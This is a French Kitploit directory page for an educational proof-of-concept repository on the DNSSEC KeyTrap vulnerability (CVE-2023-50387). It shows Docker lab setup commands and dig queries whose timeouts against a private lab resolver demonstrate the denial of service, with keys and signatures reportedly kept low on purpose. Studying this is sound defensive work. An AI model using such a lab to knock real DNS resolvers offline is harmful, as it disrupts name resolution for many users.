Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-50387 — Preuve de concept pédagogique pour la vulnérabilité KeyTrap de DNSSEC (CVE-2023-50387) avec un environnement de laboratoire basé sur Docker pour démontrer des attaques par complexité algorithmique sur les résolveurs DNS. | Kitploit
Outils/GitHubGitHub/knqyf263/cve-2023-50387
Analyse des VulnérabilitésExploitationSécurité RéseauApprentissage et ÉducationAnalyse DNSLabs et Pratique
GitHubknqyf263/cve-2023-50387

CVE-2023-50387

Preuve de concept pédagogique pour la vulnérabilité KeyTrap de DNSSEC (CVE-2023-50387) avec un environnement de laboratoire basé sur Docker pour démontrer des attaques par complexité algorithmique sur les résolveurs DNS.

Voir le dépôt
45104il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-50387

KeyTrap dans le DNS (CVE-2023-50387)

Ce dépôt est à des fins éducatives. Le nombre de clés et de signatures a été volontairement maintenu bas pour empêcher leur utilisation dans de véritables attaques, et aucun script de génération de clés en collision n'est inclus.

Test

network

Mise en place de l'environnement PoC

root@kitploit:~
$ docker compose up --build

Vérification du fonctionnement de DNSSEC

root@kitploit:~
$ docker compose exec -it attacker dig @10.10.0.3 a.a.test

; <<>> DiG 9.18.24 <<>> @10.10.0.3 a.a.test
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 44249
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;a.a.test.                      IN      A

;; ANSWER SECTION:
a.a.test.               86400   IN      A       10.10.0.4

;; Query time: 30 msec
;; SERVER: 10.10.0.3#53(10.10.0.3) (UDP)
;; WHEN: Sun Feb 18 22:01:01 UTC 2024
;; MSG SIZE  rcvd: 53

Déclenchement de KeyTrap

root@kitploit:~
$ docker compose exec -it attacker dig @10.10.0.3 www.a.test
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out

; <<>> DiG 9.18.24 <<>> @10.10.0.3 www.a.test
; (1 server found)
;; global options: +cmd
;; no servers could be reached
root@kitploit:~
$ docker compose exec -it attacker dig @10.10.0.3 b.a.test
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out

; <<>> DiG 9.18.24 <<>> @10.10.0.3 a.a.test
; (1 server found)
;; global options: +cmd
;; no servers could be reached

Références

  • https://www.athene-center.de/en/keytrap
Télécharger l’outil